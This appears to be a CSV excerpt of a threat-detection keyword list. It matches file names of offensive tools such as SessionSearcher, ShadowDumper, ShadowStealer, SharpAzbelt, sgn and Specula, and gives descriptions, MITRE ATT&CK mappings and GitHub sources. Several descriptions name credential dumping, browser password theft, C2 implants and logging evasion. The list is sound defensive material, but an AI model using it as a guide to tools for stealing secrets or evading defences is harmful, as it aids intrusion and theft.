"*\Sessions\SH-MatchedGroups-*.txt*",".{0,1000}\\Sessions\\SH\-MatchedGroups\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","18378"
"*\SessionSearcher.csproj*",".{0,1000}\\SessionSearcher\.csproj.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","18379"
"*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18380"
"*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","18381"
"*\set_allowlongscriptruntime.py*",".{0,1000}\\set_allowlongscriptruntime\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18382"
"*\set_allowlongscriptruntime.txt*",".{0,1000}\\set_allowlongscriptruntime\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18383"
"*\SetClipboardCommand.cs",".{0,1000}\\SetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18386"
"*\SetNTLM.ps1*",".{0,1000}\\SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","18388"
"*\setvaluehkcuregistry.py*",".{0,1000}\\setvaluehkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18390"
"*\setvaluehkcuregistry.txt*",".{0,1000}\\setvaluehkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18391"
"*\sgn.exe*",".{0,1000}\\sgn\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18393"
"*\sgn_linux-amd64.zip*",".{0,1000}\\sgn_linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18394"
"*\sgn_windows-amd64.exe*",".{0,1000}\\sgn_windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18395"
"*\sgn_windows-amd64.zip*",".{0,1000}\\sgn_windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18396"
"*\sgn32.exe*",".{0,1000}\\sgn32\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18397"
"*\shad0w.py*",".{0,1000}\\shad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18398"
"*\shad0w.scr*",".{0,1000}\\shad0w\.scr.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18399"
"*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","18400"
"*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18401"
"*\ShadowCredentials.cs*",".{0,1000}\\ShadowCredentials\.cs.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18402"
"*\ShadowDumper.*",".{0,1000}\\ShadowDumper\..{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","18403"
"*\ShadowSpray.cs*",".{0,1000}\\ShadowSpray\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18409"
"*\ShadowSpray.exe*",".{0,1000}\\ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18410"
"*\ShadowSpray.sln*",".{0,1000}\\ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18411"
"*\ShadowSpray\*.cs*",".{0,1000}\\ShadowSpray\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18412"
"*\ShadowStealer.csproj*",".{0,1000}\\ShadowStealer\.csproj.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18413"
"*\ShadowStealer.csproj*",".{0,1000}\\ShadowStealer\.csproj.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18414"
"*\ShadowStealer.sln*",".{0,1000}\\ShadowStealer\.sln.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18415"
"*\ShadowStealer\*",".{0,1000}\\ShadowStealer\\.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18416"
"*\ShadowTech Rat.exe*",".{0,1000}\\ShadowTech\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18417"
"*\shareaudit.exe*",".{0,1000}\\shareaudit\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","18418"
"*\ShareAudit.sln*",".{0,1000}\\ShareAudit\.sln.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","18419"
"*\Sharefinder.ps1*",".{0,1000}\\Sharefinder\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","18420"
"*\ShareFinder.txt*",".{0,1000}\\ShareFinder\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","18421"
"*\Shares_CleanupCommand.txt*",".{0,1000}\\Shares_CleanupCommand\.txt.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18422"
"*\Shares_Readable.txt*",".{0,1000}\\Shares_Readable\.txt.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18423"
"*\Shares_Writable.txt""*",".{0,1000}\\Shares_Writable\.txt\"".{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18424"
"*\Sharp3389.exe*",".{0,1000}\\Sharp3389\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18425"
"*\SharpADWS.csproj*",".{0,1000}\\SharpADWS\.csproj.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18426"
"*\SharpADWS.sln*",".{0,1000}\\SharpADWS\.sln.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18427"
"*\SharpADWS\*",".{0,1000}\\SharpADWS\\.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18428"
"*\SharpADWS-master*",".{0,1000}\\SharpADWS\-master.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18429"
"*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18430"
"*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18431"
"*\SharpAltSecIds.exe*",".{0,1000}\\SharpAltSecIds\.exe.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18432"
"*\SharpAltSecIds.sln*",".{0,1000}\\SharpAltSecIds\.sln.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18433"
"*\SharpAltSecIds-master*",".{0,1000}\\SharpAltSecIds\-master.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18434"
"*\SharpAppLocker.*",".{0,1000}\\SharpAppLocker\..{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","18435"
"*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18436"
"*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18437"
"*\SharpAVKB.exe*",".{0,1000}\\SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18438"
"*\SharpAVKB.exe*",".{0,1000}\\SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18439"
"*\SharpAVKB.pdb*",".{0,1000}\\SharpAVKB\.pdb.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18440"
"*\SharpAVKB-master*",".{0,1000}\\SharpAVKB\-master.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18441"
"*\SharpAzbelt.csproj*",".{0,1000}\\SharpAzbelt\.csproj.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18442"
"*\SharpAzbelt.exe*",".{0,1000}\\SharpAzbelt\.exe.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18443"
"*\SharpAzbelt.sln*",".{0,1000}\\SharpAzbelt\.sln.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18444"
